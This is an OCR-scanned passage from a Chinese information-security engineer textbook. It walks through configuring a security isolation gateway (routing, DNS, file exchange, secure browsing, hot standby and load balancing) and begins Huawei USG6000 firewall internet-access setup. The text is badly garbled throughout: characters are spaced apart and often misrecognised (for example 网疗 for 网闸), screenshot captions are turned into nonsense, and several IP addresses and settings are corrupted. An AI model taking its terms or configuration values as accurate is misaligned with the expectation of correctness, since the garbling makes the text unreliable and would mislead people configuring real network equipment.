以 设置 元 余 设 备 工作 的 模式 ， 修 改 工作 模式 需要 保存 并 重启 安全 隔离 网 疗 才能 生效 。 具 
体 配 置 可 见 配 置 高 可 靠 性 和 端口 元 余 。 

(2) 配置 静态 路 由 

该 系统 静态 路 由 支持 按 目 的 地 址 的 路 由 ， 即 按 数据 包 中 的 目的 IP 地 址 来 决定 下 一 
跳 地址 。 修 改 网 络 设备 的 IP 地 址 可 能 会 影响 到 相应 的 路 由 规则 。 建 议 首先 配置 网 络 设 
备 的 地 址 ， 再 配置 路 由 规则 。 管 理 员 可 以 在 图 6-14 所 示 界 面 中 添加 ， 编 辑 ， 删 除 ， 启 用 
或 者 禁用 静态 路 由 规则 。 吏 态 路 由 规则 的 参数 包括 目的 地 址 、 掩 码 、 下 一 跳 地 址 和 网 络 
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接口 。 如 图 6-15 所 示 下 一 跳 地 址 应 该 和 相应 的 网 络 接口 在 同一 网 段 内 。 还 需 注意 ,“ 网 
络 接口 ”不 能 为 已 配置 成 虚拟 地 址 的 别名 设备 ， 否 则 该 路 由 失效 。 


= 图 系统 配置 BARE MSH 

3 rears 
Ø 域名 服务 器 
@ wae EEST 下 一 跳 网 络 接口 。 是 否 启 用 ”操作 

= ği 高 可 靠 性 设置 10. 11. 0. 0/255. 255. 0. 0 192. 168. 0.3 fe3_0 m r ñ 

G sE - 

oO weiss 添加 

田 rera 

m ha MD: D DOD ginn aal |a [Go] em [20 ya BE 


图 6-14 静态 路 由 配置 


* 目的 地 址 : 
掩 码 : |255. 255. 0.0 


* 下 一 跳 地 址 : [132 166.0. 可 | 


* 网 络 接口 : |fe3_0 


O @ Internet 


图 6-15 ”静态 路 由 的 维护 


G) 配置 域名 服务 器 

如 果 管 理 员 设置 了 邮件 代理 等 服务 ， 则 需要 配置 SIS 安全 隔离 网 疗 的 域名 服务 器 ， 
用 于 SIS 安全 隔离 网 疗 自身 向 外 发 数据 包 时 的 域名 解析 。 例 如 SIS 安全 隔离 网 闸 如 果 需 
要 配置 动态 域名 ， 也 必须 设 定 此 处 的 域名 服务 器 ， 如 图 6-16 所 示 。 


= OY 系统 配置 网 络 配置 >> 域 名 服务 回 
己基 Pees 
@ 网 络 设备 域名 服务 器 
Ø 域名 服务 器 域名 服务 器 1 TP 
@ este $ 3 
站 域名 服务 器 2 TP: 
en 


图 6-16 域名 服务 器 配置 


其 中 域名 服务 器 1 具有 较 高 的 优先 级 。 
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6.2.2.3 ”主要 功能 的 配置 

从 安全 隔离 与 信息 交换 系统 的 应 用 需求 来 说 ， 分 为 三 大 类 型 : 交换 类 (镜像 型 )、 访 
问 类 及 其 他 类 。 交 换 类 型 主要 包含 : 文件 交换 (有 客户 端 与 无 客户 端 )、 数 据 库 同 步 、 消 
息 模块 及 数据 交换 平台 等 ， 访 问 类 型 主要 包含 ， 安 全 浏览 、FTP 访问 、 数 据 库 传输 、 邮 
件 传输 、 定 制 访问 及 安全 通道 等 ， 辅 助 类 型 主要 包含 : 高 可 靠 性 、 统 一 用 户 认证 等 。 这 
里 主要 对 文件 交换 、 安 全 浏览 和 高 可 靠 性 等 三 个 功能 的 配置 过 程 进行 简要 介绍 。 

1. 配置 文件 交换 

文件 交换 分 为 无 客户 端 版 文件 交换 和 有 客户 端 版 文件 交换 。 

(1) 无 客户 端 版 文件 交换 的 配置 

该 应 用 模块 要 求实 现 从 内 网 到 外 网 文件 的 单 向 同步 。 根 据 网 络 拓扑 ， 其 具体 需求 要 
点 如 下 : 

O 网 闻 内 、 外 网 络 口 各 直 连 一 台 装 有 WindowsXP Professional 系统 的 文件 交换 服 
务 器 ; 

© 发 送 端 与 接收 端 文件 交换 服务 器 各 设置 一 个 共享 目录 (sharedir), 开放 其 读 、 写 权 
限 ， 并 且 不 受用 户 限制 ; 

© TP 地 址 设置 如 图 6-17 所 示 。 


EE Geet oat 


2 20.2/2: 
192.168.20.2/24 内 :192.168.20.1 | 9h: 192.168 .10.1 192.168.10 2/24 


到 


文件 交换 服务 器 z 
送 端 发 送 | IEZ 文件 交换 服务 器 
发 送 端 发 送 任务 | 接收 任务 aie 


图 6-17 无 客户 端 版 文件 交换 配置 网 络 拓扑 图 


网 闸 内 配置 发 送 接收 任务 以 及 开启 服务 具体 设置 如 下 : 

其 中 网 疗 内 配置 发 送 接收 任务 如 图 6-18 和 图 6-19 所 示 。 

然后 ， 在 内 网 人 出， 进入 “文件 交换 一 基本 配置 ” 选择 “ 仅 发 送 ”， 并 启动 服务 。 

在 外 网 人 出 ， 进 入 “文件 交换 一 基本 配置 ” 选择 “ 仅 接受 ”， 并 启动 服务 。 

(2) 有 客户 端 版 文件 交换 的 配置 

该 应 用 模块 要 求实 现 从 内 网 到 外 网 文件 的 单 向 同步 ( 明 通 )。 根 据 网 络 拓扑 ， 其 具体 
需求 要 点 如 下 : 

© 网 闻 内 、 外 网 络 口 各 直 连 一 台 装 有 WindowsXP Professional 系统 的 文件 交换 服 
务 器 ; 

@ 发 送 端 文件 交换 服务 器 设置 发 送 目录 : send; 接收 端 文件 交换 服务 器 设置 接收 目 
K: recv; 这 两 个 目录 具备 读 写 权限 ; 


zs 
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© 在 文件 交换 服务 器 上 安装 自主 研发 的 客户 端 软件 ， 默 认 登 录 时 用 户 、 密 码 均 为 : 


admin; 
[ oT TT 
Oa E 
z NAmE ||) 文件 交换 > 任务 管理 >> 发 送 任务 
INT eRe E8 
s Q miker 1 
a Qx | [H5S Essak RSBRSE XFAR CRIS USTER ESAS HSAN TAHE MF 
1 10.50. 10.208 Sharedir sabfs RZA 是 再 3 once_tine 区 
Gates fi 
sN asse 
mses 
Gekes 
+ Qrenel 1100858 填写 : 192.168.20.2 
2 rrd 10.50.10.208 


= 用 户 名 和 密码 | 
p” ee 
3: [123456 妈 对 sMBFs 有 效 
选择 : SMBFS 传输 方式 ，@ 改名 传输 O maem O WEM 
t SRR: [ray NALS MATA 
* 完成 后 标识 : [fin HELE MAT 


包含 子 目 录 : O 20 F 
是 否 杀 毒 是 = 
* 同步 间隔 : |3 E] 
生效 时 段 : [once-tine [~] 
[ Smr- || 确定 ]| 取消 


图 6-18 添加 内 网 侧 发 送 任务 


r SSS 
| “文件 交换 > 任务 管理 > 接收 任务 
) pis = [E8] 
| #38 BS Bini EZEREZ 文件 系统 操作 
5 10. 50. 10.202 J tmp/share nfs 


6 10.50. 10.208 sharedir snbfs 


= BEES - Microsoft Internet Explorer 


m= = 


ik 


收 任务 号 一 致 


项 写 : 用 户 名 和 密码 | 


Bsr A 


图 6-19 ”添加 外 网 侧 接收 任务 
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@ 下 地 址 设置 如 图 6-20 所 示 。 


内 : 192 .168 .20.1 | 外 :192 .168 .10.1 
192.168.20.2 -an a il 192.168.10.2 
D 7 I 4 Q J 


文件 交换 服务 器 
CR 3 RES 文件 交换 服务 器 
Bee Faia | Sa ee 
图 6-20 有 客户 端 版 文件 交换 配置 网 络 拓扑 图 
具体 配置 过 程 如 下 : 


配置 文件 交换 服务 器 接收 端 一 一 设置 监听 端口 、 接 收 用 户 、 接 收 任务 。 如 图 6-21 
所 示 。 


加 和 P92 填 写 接收 用 户 :recv 


ts Ese Te 
BSA + 


图 6-21 配置 文件 交换 服务 器 接收 端 


如 果 采 用 加 密 传 输 , 网 疗 证 书 公共 名 填写 外 侧 网 疗 的 证 书 公共 名 , 并 且 进 入 菜单 “ 系 
统一 系统 选项 弹出 “系统 设置 ”对 话 框 ， 如 果 是 加 密 传输 ， 在 “采用 身份 认证 及 加 密 
传输 ”一 栏 打上 复 选 框 。 

在 网 闸 外 侧 添加 服务 端 任务 ， 如 图 6-22 所 示 。 


joo 
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文件 交换 > 服务 端 


后 输入 关键 宇 


查找 


任务 号 


本 地 备份 。 备注 


* 服 务 器 地 址 


GH “10.50. 10.10” ) 


IRS SHAD: [12000 


@ 填写 : 12000 


本 地 备份 : 


客户 端 证 书 公共 名 : 


身份 认证 及 传输 加 密 : OL OF 


2.8 


图 6-22 添 


加 网 闸 外侧 服 务 端 任务 


如 果 采 用 加 密 传 输 ， 客 户 端 证 书 公 共 名 填写 文件 交换 服务 器 接收 端的 证 书 公共 名 。 
在 网 闸 内 侧 添加 客户 端 任务 ， 如 图 6-23 所 示 。 


文件 交换 > 客户 端 


eA 


查找 


* 任 务 号 


* 本 机 地 址 
+ 本 机 端口 
本 地 备份 
身份 认证 及 传输 加 密 
客户 端 证 书 公共 名 


源 地 址 : 


(同一 端的 任务 号 必须 唯一 ) 


any z @ 

192. 168. 20.1 <7 | 
1 二 treesss © 填写 : 12000 |! 
£08 | 


图 6-23 添 


加 网 闸 内 侧 客户 端 任务 


2.168.20.1 
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如 果 采 用 加 密 传 输 ， 客 户 端 证 书 公 共 名 填写 文件 交换 服务 器 发 送 端的 证 书 公共 名 ; 
如 果 需 要 对 传输 的 文件 进行 内 容 过 滤 ， 则 对 “内 容 控制 ”进行 适当 配置 ; 

配置 文件 交换 服务 器 发 送 端 一 一 设置 网 闸 地 址 及 端口 、 发 送 用 户 、 发 送 任务 ， 如 图 
6-24 所 示 。 


O 序号 与 任务 
名 称 随便 填写 


maei fiean Faia | 15000 习 0-6588) 
测试 连接 
Edao is d 
接收 任务 监听 端口 [ 12004] 0-6553) D 选择 发 送 目录 


等 天 


eaan Fa z mmea CA CH 
sran ET 司 wine >e 
tea [es 


备 ë [ 
确定 取消 
图 6-24 配置 文件 交换 服务 器 发 送 端 


启动 服务 ， 顺 序 为 : 首先 启动 文件 交换 服务 器 接收 端 服务 ， 如 图 6-25 所 示 。 


hE RA 


号 联想 网 御 文 件 交 找 客 户 端 系统 启动 接收 端 


BK 任务 AP 


图 6-25 ”启动 文件 交换 服务 器 接收 端 服务 


然后 在 “文件 交换 一 基本 配置 ”中 分 别 启动 网 闻 内 外 侧 服 务 。 
最 后 启动 文件 交换 服务 器 发 送 端 服务 ， 如 图 6-26 所 示 。 


oso 一 信息 安全 工程 师 教 程 


isk fap ss T: m a ‘end Settings \i 


图 6-26 ”启动 文件 交换 服务 器 发 送 端 服务 


2. 配置 安全 浏览 

该 应 用 模块 要 求实 现 内 网 正 浏览 器 用 户 通过 安全 隔离 网 闸 安全 地 访问 外 网 Webb 服 
务 器 (在 TE 浏览 器 地 址 栏 输入 : http: /192.168.10.2 后 , 返回 正确 的 页 面 , 说 明 访 问 成 功 )。 
根据 网 络 拓扑 ， 其 具体 需求 要 点 如 下 : 

O 网 闻 内 、 外 网 络 口 各 直 连 一 台 装 有 WindowsXP Professional 系统 的 主机 ， 与 网 闸 
外 侧 相连 的 是 Web 服务 器 (端口 : 80)， 与 网 闸 内 侧 相连 的 是 E 浏览 器 用 户 ; 

@ 今 要求 以 透明 和 普通 两 种 方式 访问 ; 

@ 下 地 址 设置 如 图 6-27 所 示 。 


192.168.20.2/24 i 
内 :192.168.20.11 外 :192.168.10.1 。 192.168.10.2/24 


vE él | 


Web 服务 器 
图 6-27 安全 浏览 网 络 拓扑 图 


(1) 添加 网 闸 内 侧 访问 控制 中 的 访问 规则 ， 并 启动 服务 
添加 普通 访问 规则 ， 如 图 6-28 所 示 。 


本 安全 滑 览 》> 访 问 控 制 > 器 通 访问 


图 6-28 添加 普通 访问 规则 


第 6 章 网 络 安全 技术 与 产品 los 


其 中 ， 源 地 址 addrgroup] 包含 了 192.168.20.2; 普通 访问 时 ， 在 下 浏览 器 中 添加 代 
理 服 务 器 ， 具 体 代理 IP: 192.168.20.1， 端 口号 : 80; 
添加 透明 访问 规则 ， 如 图 6-29 所 示 。 


- 
$ IFLR el 

e Q rra 安全 浏览 > 访问 控制 ?> 透明 访问 

Nae 


Bist = 目的 地 址 RRO Https 


[en | 


图 6-29 添加 透明 访问 规则 


源 地 址 addrl 包含 了 192.168.20.2; 目的 地 址 lenovo 包含 了 192.168.10.2; 透明 访问 
不 支持 负载 均衡 ; 透明 访问 时 ， 需 要 在 TE 浏览 器 用 户主 机 上 添加 一 个 默认 网 关 或 静态 路 
由 指向 网 闸 内 侧 的 IP: 192.168.20.1; 

启动 服务 ， 如 图 6-30 所 示 。 

(2) 启动 网 闸 外 侧 服务 

无 论 是 透明 访问 还 是 普通 访问 ， 仅 进入 “安全 浏览 一 基本 配置 ” 启动 服务 。 

(3) ACHE TE 浏览 器 用 户主 机 

针对 普通 访问 ， 需 要 设置 代理 ， 步 又 如 下 : 

打开 浏览 器 ， 找 到 “Intemet 选项 (0)...”， 单 击 “Internet 选项 (O)...”， 弹 出 对 话 框 ， 
找到 “连接 ”标签 ， 单 击 “ 局 域 网 设置 (L)...”， 弹 出 对 话 框 ， 如 图 6-31 所 示 。 

针对 透明 访问 ， 需 要 设置 默认 网 关 或 静态 路 由 ， 方 法 如 下 : 

添加 默认 网 关 ， 步 骤 如 下 : 


信息 安全 工程 师 教程 


GA 


O 首页 


国 四 二 系统 配置 安全 浏览 > 基本 配置 


建议 采用 默认 值 


本 机 监听 地址 
本 机 监听 端口 


人 允许 的 Mtty 方 法 
+ Jtttp 协 议 可 访问 端口 -0 21, 449863, 70, 210, 280, 488,491, 117 


* Https 协 议 可 访问 端口 


透明 访问 时 必须 为 80 


间 的 应 用 ， 范围 为 
则 建议 在 这 两 个 编 
ten 


d [2009 4000) . 


ENEDA", “分 开 


E Nn 
NRHN 


& Geese 
CET 


当前 服务 状态 : 启动 


启动 服务 


停止 服务 


联想 网 佣 科 技 ( 北京 ) 有 限 公 司 版 权 所 有 


BHA (LANKE 


图 6-30 ”启动 服务 


自动 配置 


口 自动 检测 设置 &) 
口 使 用 自动 配置 脚本 


IE ÆR) 


代理 服务 器 


上 要 确保 使 用 手动 设置 ,请 禁用 自动 配 


回 汶 LAN AREIRES U 
VPN 连接 )。 


在 此 填写 代理 地 址 (网 曾 内 侧 地 址 ) 
【 192 .168 .20.1】 和 安全 浏览 模块 基 
本 配置 中 的 本 地 监听 端口 [ 80 】 


GHEE TSR ATES 


地 址 Œ): 


|192. 168. 20.1 | #1 @): feol 


SR 0)... 


打开 “本 地 连接 状态 ”对 话 框 “ 属 性 (P)” 按 钮 ， 单 击 “ 本 地 连接 属性 ” 对话 框 “ 属 


按 下 确定 ， 代 理 添加 完毕 ”也 R 


图 6-31 


代理 设置 


性 (R)” 按 钮 ， 弹 出 如 图 6-32 所 示 默 认 网 关 设 置 。 


Internet 协议 (ICP/IP) 属性 


ea | 
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E ， 则 可 以 获取 


© 自动 获得 IP 地 址 @) 
全 使 用 下 面 的 IP 地 址 G): 


FARB W: 


自动 获得 DNS 服务 器 地 址 @) 


首选 DRS 服务 器 全): 


动 指派 的 IP RE. AM, 
的 IP RE. 


HEREZE a 
gee Ros eeanaeeeee Te 


192 “168.20 . 2 | 
[ 255 .255 .255 . 0 
192.168 .20 . 1 | 


© 使 用 下 面 的 ms BARH HNA IP 
备用 ms BERM: | ] 


IE 浏览 器 用 户 的 IP 地 址 


图 6-32 ”默认 网 关 设 置 


(4) TE 浏览 器 用 户 访问 


无 论 是 普通 访问 还 是 透明 访问 , 在 正 浏览 


后 ， 如 果 访问 成 功 ， 即 可 出 现 正确 访问 页 面 。 
3. 配置 高 可 靠 性 和 端口 元 余 


通过 典型 应 用 讲解 如 何 配置 网 疗 的 双 机 热 备 、 负 载 均衡 以 及 网 络 端口 见 余 ， 从 而 实 
现 网 闻 的 高 可 靠 性 。 目标 : 今 以 安全 浏览 普通 访问 方式 为 例 , 从 正 浏览 器 通过 安全 隔离 
网 闸 安全 地 访问 Web 服务 器 资源 【在 单 闻 环境 下 ,实现 网 络 口 备 份 和 链 路 聚合 ; 


环境 下 ， 实 现 双 机 热 备 和 负载 均衡 ]。 该 应 用 环境 使 用 要 点 如 下 : 


© 网 闻 内 、 外 网 络 口 各 直 连 一 台 装 有 WindowsXP Professional 系统 的 主机 ,与 网 闸 


外 侧 相连 的 是 Web 服务 器 主机 ， 与 网 疗 内侧 相 连 的 是 TE 浏览 器 主机 ; 


@ 主 闻 内 侧 名 称 : MI; 主 闻 外 侧 名 称 : MO; Mi AMAR: SI; 从 闸 外 侧 名 称 : 


SO; 
@ IP 地址 设置 如 图 6-33 所 示 。 
(1) 网 口 备份 / 链 路 聚合 


主 网 闸 内 侧 开放 了 两 个 网 络 口 ， 分 别 是 FE3、FE4， 用 于 做 端口 元 余 。 具 体操 作 步 


又 如 下 : 


器 地 址 栏 输入 : http: / 192.168.10.2 回 车 


在 双 机 


653 
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= 


192.168.1.3 内 | 外 192.168.2.3 


1 
192.168.2.1 Ke 


[i 

J 

' 

| i 

.168.1.2 内 | 外 192.168.2.2 i 


10.0.0.71 110.0.0.72 
wd | ! 


管理 主机 
10.0.0.0/24 


图 6-33 ”高 可 靠 性 和 端口 元 余 拓扑 图 


选择 待 绑 定 物理 网 口 工作 模式 ;元 余 模 式 
这 里 ， 以 绑 定 FE3、FE4 为 例 ， 如 图 6-34 所 示 。 


当 物理 设备 维护 - 了 icrosof ee [Fes fel] _FF 


名 称 : |fe (不 能 修改 ) 

WAC 地址: |00:0C:29:6D:2E:85 

链 路 工作 模式 :| 自 适 应 =- 
链 路 速度 : |100 = 
MTU: |1500 

工作 模式 : 

TF 地 址 获取 : 


FFB IPMACHAILS ESE: 


Ja hee arenes: lilt 


图 6-34 选择 待 绑 定 物理 网 口 工作 模式 


设置 元 余 设备 ， 并 绑 定 相应 物理 网 口 ， 如 图 6-35 所 示 。 
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王选 择 设备 名 称 


* 选择 设备 名 称 : 上 = 
工作 模式 : | 路 由 模式 - 
?地 址 获 职 : STE 


FRE TAIL IP 地 址 : 
【 192 .168 .1.2/24 】 


TI 地 地 [192. 168.0. 10 
iE 13S. 255. 255.0 


开启 IPAC 地 址 绑 定 :所 
RAMMED: 王 待 绑 定 物理 端口 ，[ fe3. fe4 
FEPHIRREE: m 
可 过 二 定 设备 列表 gehen 
C? 
十 定 设备 选择 : 


< 


图 6-35. 宛 余 设备 属性 设置 


通过 后 台 抓 包 的 方式 ， 观 察 是 否 成 功 。 

打开 两 个 SecureCRT 终端 (简称 A、B 端 )， 以 dump 身份 登录 主 疗 内 侧 后 台 , 分 别 抓 
包 如 下 : 

tcpdump -ieth2 -n tcp andport80 # 在 A 端 FE， 抓 fe3 

tcpdump -ieth3 -ntcp andport80 # EB iE, Yi fe4 

测试 方法 如 下 : 

检查 端口 备份 : 拔 掉 fe3 网 线 ， 观 察 能 否 在 fe4 上 抓 到 80 的 包 反之 ， 再 观察 fe3。 
重复 测试 成 功 ， 说 明 端 口 备份 成 功 。 

检查 链 路 聚合 :分别 接 上 fe3、fe4 网 线 ， 观 察 能 否 同 时 在 f3、fe4 上 抓 到 80 的 包 ， 
重复 几 次 均 成 功 ， 说 明 链 路 聚合 成 功 。 

(2) 双 机 热 备 

取消 主 疗 内 侧 元 余 端 口 配 置 ， 还 原 网 络 口 原 来 配置 ， 即 为 : fe3 主 IP 为 192.168.1.2。 

配置 主 网 闸 内 侧 HA 

基本 配置 : 进入 “网 络 配置 一 高 可 靠 性 一 基本 配置 ” 工作 角色 ， 选 择 本 机 作为 主 


m 


Joss) 


Wessi rset reine 


W; 本 机 主机 名 MI， 对 端 主机 名 SI。 

虚拟 地 址 : 192.168.1.1/255.255.255.0， 进 入 “网 络 配置 一 高 可 靠 性 一 虚拟 地 址 ” 单 
击 添加 ， 网 络 接口 为 f3， 地 址 / 掩 码 为 192.168.1.1/24。 

配置 从 网 闹 内 侧 HA 

基本 配置 : 工作 角色 选择 本 机 作为 从 冰 ; 本 机 主机 名 ST; 对 端 主机 名 MI; 

虚拟 地 址 : 192.168.1.1/255.255.255.0 

方法 与 上 类 似 。 

配置 主 网 闹 外 侧 HA 

基本 配置 : 工作 角色 选择 本 机 作为 主 闸 ; 本 机 主机 名 MO; 对 端 主机 名 SO; 

虚拟 地 址 : 如 果 没有 从 外 到 内 的 访问 ， 无 须 再 配置 。 

方法 与 上 类 似 。 

配置 从 网 闸 外 侧 HA 

基本 配置 ， 工作 角色 选择 本 机 作为 从 闲 ; 本 机 主机 名 SO; 对 端 主机 名 MO; 

虚拟 地 址 : 如 果 没 有 从 外 到 内 的 访问 ， 无 须 再 配置 。 

方法 与 上 类 似 。 

启动 HA 服务 

分 别 进入 “网 络 配置 一 高 可 靠 性 一 基本 配置 ?， 依 次 启动 网 疗 四 侧 HA 服务 。 

通过 后 台 抓 包 的 方式 ， 观 察 是 否 成 功 

打开 两 个 SecureCRT 终端 (简称 A, B 端 )， 以 dump 身份 分 别 登录 主 / 从 闸 内 侧 后 台 ， 
分 别 抓 包 如 下 : 

tcpdump -ieth2 -n tcp and port 80 # 在 A iE, TEMA MM 

tcpdump -ieth2 -n tcp and port 80 # 在 B 端 上 ， 抓 从 闸 内 侧 的 包 

测试 方法 如 下 : 

检查 双 机 热 备 : 拔 掉 与 主 闻 内 侧 fe3 相连 的 网 线 , 观察 能 否 在 从 闻 内 侧 抓 到 80 的 包 ， 
重复 测试 几 次 ， 观 察 主 /从 是 否 切换 。 若 测试 成 功 ， 说 明 双 机 热 备 成 功 。 

G) 负载 均衡 

配置 主 网 闸 内 侧 HA 

基本 配置 : 同上 。 

虚拟 地 址 : 同上 。 

负载 均衡 配置 ， 如 图 6-36 所 示 。 

REMMI AM HA 

基本 配置 同上 。 

虚拟 地 址 : 同上 。 
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负载 均衡 配置 ， 同 上 。 


n 


O 首页 2| 


= Ñ ZARE p 网 络 配置 >> 高 可 靠 性 设置 >> 负 载 均 衡 
请 输入 关键 字 


查找 


Ø 域名 服务 器 


Ø waked 1 192.168.0.10 80 192.168.0100 80 192. 168.0. 200 


FS itt SO ARA AKRO ”真实 地 址 2 真实 端口 2 ”操作 


a ff 


= Q areas 
@ 基本 配置 添加 
GA 虚拟 地 址 
后 nese 


EHETE 


*# 虚拟 地 址 ; [192. 168, 0. 10 
* 真实 地 址 1; |192. 168.0. 100 | 
真实 地 址 3; 


Beau RKB | 


真实 地 址 9: sns: 真实 地 址 10: 端口 2; [80] i 


真实 地 址 11: | Fie: | 真实 地 址 12: | 
Beis | | :| Rt = 


真实 地 址 15 | 真实 地 址 16: | 


| w 


职 消 


图 6-36 主 网 闸 内 侧 高 可 靠 性 设置 负载 均衡 设置 


配置 主 网 闸 外 侧 HA 

基本 配置 同上。 

虚拟 地 址 : 同上 。 

负载 均衡 配置 ， 如 果 没 有 从 外 到 内 的 访问 ， 无 须 再 配置 。 
配置 从 网 闸 外 侧 HA 

基本 配置 同上 。 

虚拟 地 址 : 同上 。 

负载 均衡 配置 ， 如 果 没 有 从 外 到 内 的 访问 ， 无 须 再 配置 。 
启动 HA 服务 

同上 。 

通过 后 台 抓 包 的 方式 ， 观 察 是 否 成 功 


打开 两 个 SecureCRT 终端 (简称 A、B 端 )， 以 dump 身份 分 别 登录 主 / 从 疗 内侧 后 台 ， 


分 别 抓 包 如 下 : 
tcpdump -ieth2 -n tcp andport80 # 在 A 端 上 ， 抓 主 闸 内 侧 的 包 


Gi 


oss) 
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tcpdump -ieth2 -n tcp and port 80 # 在 B 端 上 ， 抓 从 疗 内 侧 的 包 

测试 方法 如 下 : 

检查 负载 均衡 观察 能 否 在 主 /从 闻 内 侧 同 时 抓 到 80 的 包 。 若 测试 成 功 ， 说 明 负 载 
均衡 成 功 。 

需要 注意 的 是 : 在 做 双 机 热 备 的 同时 ， 不 能 做 端口 元 余 ; 双 机 热 备 时 物理 接口 为 网 
络 口 ， 且 为 该 接口 的 IP 别名 ; 多 机 集群 (负载 均衡 ) 支 持 2~16 台 网 疗 ; 元 余 端 口 必须 是 
网 络 口 (物理 接口 ); 虚拟 地 址 数目 最 大 支持 254 个 。 


6.2.3 ”华为 USG6000 系列 下 一 代 防 火 墙 


6.2.3.1 简介 

企业 网 络 正 向 以 移动 宽带 、 大 数据 、 社 交 化 和 云 服 务 为 核心 的 下 一 代 网 络 演进 。 移 
动 APP、Web2.0、 社 交 网 络 让 企业 处 于 开放 的 网 络 环 境 ， 攻 击 者 通过 身份 仿冒 、 网 站 挂 
马 、 恶 意 软 件 、 伪 尸 网 络 等 多 种 方式 进行 网 络 渗透 ， 企 业 面临 前 所 未 有 的 安全 风险 ， 传 
统 防 火 墙 面 对 变革 却 无 能 为 力 。 

华为 Secospace USG6000 系列 下 一 代 防 火 墙 是 面向 下 一 代 网 络 环境 ， 基 于 
“ACTUAL” 感 知 体系 ， 如 图 6-37 所 示 。 即 通过 对 应 用 、 用 户 、 内 容 、 威 胁 、 时 间 、 位 
置 6 个 维度 的 全 面 感知 ， 实 现 安全 管理 自我 优化 ， 通 过 云 技术 识别 未 知 威胁 ， 高 性 能 
为 企业 提供 以 应 用 层 威胁 防护 为 核心 的 下 一 代 网 络 安全 。 


:mm ee 
„00011101 , ;Ed Pn J Ma QD zs 


Pann, H Q Content |: 7a 7 
11100100 i 内 容 | 威胁 


10101100, | |B arcs 
01010100. | 


| 

| 

| | | 

..01010100 ct ey 
onmo” | Y Location |; Gh co 


网 络 环境 ”ACTUAL 感 知 体系 业务 环境 


图 6-37 ACTUAL 感知 体系 


6.2.3.2 ”配置 互联 网 接 入 
以 通过 静态 IP 接 入 互联 网 为 例 ， 对 防火 墙 接 入 互联 网 进行 配置 。 


第 6 章 ”网络 安全 技术 与 关 659 


1. 登录 Web 配置 页 面 默认 设置 

管理 接口 : GE0/0/0 

IP Hit: 192.168.0.1/24 (https) 

默认 用 户 名 /密码 : admin/Admin@123 

2. 通过 静态 IP 接 入 互联 网 

假定 局 域 网 内 所 有 PC 都 部 署 在 10.3.0.0/24 网 段 ， 均 通过 DHCP 动态 获得 IP 地 址 ， 
如 图 6-38 所 示 。 企 业 从 运营 商 处 获取 的 固定 IP 地 址 为 1.1.1.1/24, DNS 服务 器 为 
1.2.2.2/24， 网 关 地 址 为 1.1.1.254/24。 企 业 需 利用 防火 墙 接 入 互联 网 。 


Trust 


Untrust 
10.3.0.0/24 


i 


Switch Firewall 


1.1.1.254/24 


Intranet 


GE1/0/2 
10.3.0.1/24 


GE1/0/1 
1.1.1.1/24 


图 6-38 静态 IP 接 入 互联 网 拓扑 图 


(1) 配置 接口 
选择 “网 络 一 接口 ” 单 击 GE1/0/1 对 应 的 “编辑 ”图 标 ， 按 照 静态 IP 地 址 配置 外 
网 接口 参数 配置 ， 如 图 6-39 所 示 。 


修改 GigabitEthernet 


Cm 
接口 名 称 
别名 
虚拟 系统 root Fe 
安全 区 域 untrust ~] 
模式 © 路 由 交换 sata F 
IPv4 IPO 
连接 类 型 © BOP DHCP PPPoE 
IP 地 址 111124 一 行 一 条 记录 ， 
-输入 格式 为 “11111255255255.0 
或 者 “111124r。 
默认 网 关 111254 
首选 DNS 服务 器 1222 
备用 DNS 服务 器 
多 出 口 先 项 
所 属 运营 商 全 ie ~ 
确定 取消 


图 6-39 外 网 接口 数据 参数 


of 
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配置 完成 后 ， 单 击 GE1/0/2 对 应 的 “编辑 ” 图标， 配置 内 网 接口 参数 ， 如 图 6-40 所 示 。 


| idkGigabitEthemet 


© BOP 
10.3.0.124 


首选 DNS 服务 器 
备用 DNS 服务 器 


多 出 口 选项 


BF 
a 

交换 SREM 
DHCP PPPoE 


一 行 一 条 记录 ， 
输入 格式 为 “1.1.1.1/255.255.255.0" 
或 者 "111124。 


2x 


| we | | 取消 | 


(2) 配置 DHCP 服务 器 


图 6-40 ”内 网 接口 数据 参数 


选择 “网 络 一 DHCP 服务 器 一 服务 ”， 单 击 “ 新 建 ” 按钮 ， 配 置 内 网 接口 GE1/0/2 的 


DHCP 服务 ， 使 其 为 局 域 网 内 的 PC 分 配 IP 地 址 ， 如 图 6-41 所 示 。 


新 建 DHCP 服 务 butt 
接口 名 称 GE102 国 * 
类 型 © IPs Pe 
服务 类 型 © 服务 器 hi 
可 分 本 IP 地 址 范围 10302 ~ 10.3.0.254 
FRB 255.255.255.0 
默认 网 关 10301 
DNS 服务 使 用 系统 的 DNS 设 置 © ke 
首选 DNS 服务 器 1222 
备用 DNS 服务 器 
本 高 级 
确定 | | 取消 | 
图 6-41 内 网 接口 DHCP 配置 
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(3) 配置 安全 策略 
选择 “策略 一 安全 策略 ”， 单 击 “ 新 建 ”按钮 ， 配 置 允 许 内 网 人 P 地 址 访问 外 网 ， 其 
他 安全 策略 可 根据 需求 进行 配置 ， 如 图 6-42 所 示 。 


新 建安 全 策略 Bs 
提示 : 新 建 时 可 以 基于 策略 模板 来 快速 定义 您 需要 的 第 略 。[ 法 择 第 赂 模板 F 
名 称 trust2untrust 
描述 
源 安全 区 域 trust ~ Biel 
目的 安全 区 域 untrust 图 Bil 
源 地 址 地 区 @ 1030024 上 
目的 地 址 册 区 国 请 选择 或 输入 IP 地 址 及 摘 码 
用 户 @ 请 选择 或 输入 用 户 用 户 组 ~ EZ] 
服务 请 选择 服务 w Bis] 
应 用 请 选择 应 用 或 应 用 组 
时 间 自 请 选择 时 间 自 ~ ial 
动作 © 允许 Mut 

内 容 安全 

RAS -NONE — ~ mA 

入侵 防御 -NONE — ~ mA 

URL 过 滤 -NONE — iv) mA 

Tite manr ma i 


确定 | | 取消 | 
图 6-42 配置 安全 策略 


(4) 配置 NAT 策略 

选择 “策略 一 NAT 策略 一 源 NAT”， 在 “ 源 NAT 策略 列表 ”中 单 击 “ 新 建 ” 按 钮 ， 
实现 内 网 用 户 正 常 访问 Intemet， 如 图 6-43 所 示 。 

(5) 结果 检验 

查看 接口 GE 1/0/1 的 公 网 地 址 配置 是 否 正 确 ， 物 理 状态 和 IPv4 状态 是 否 为 Up。 在 
内 部 网 络 中 的 PC 上 通过 ipconfig/all 命令 检查 网 卡 是 否 正 确 分 配 到 私 网 地 址 和 DNS 地 
址 。 检 查 内 部 网 络 中 的 PC 是 否 能 通过 域名 访问 Intemet， 若 能 访问 ， 则 表示 配置 成 功 。 
否则 ， 请 检查 配置 。 
6.2.3.3 配置 VPN 

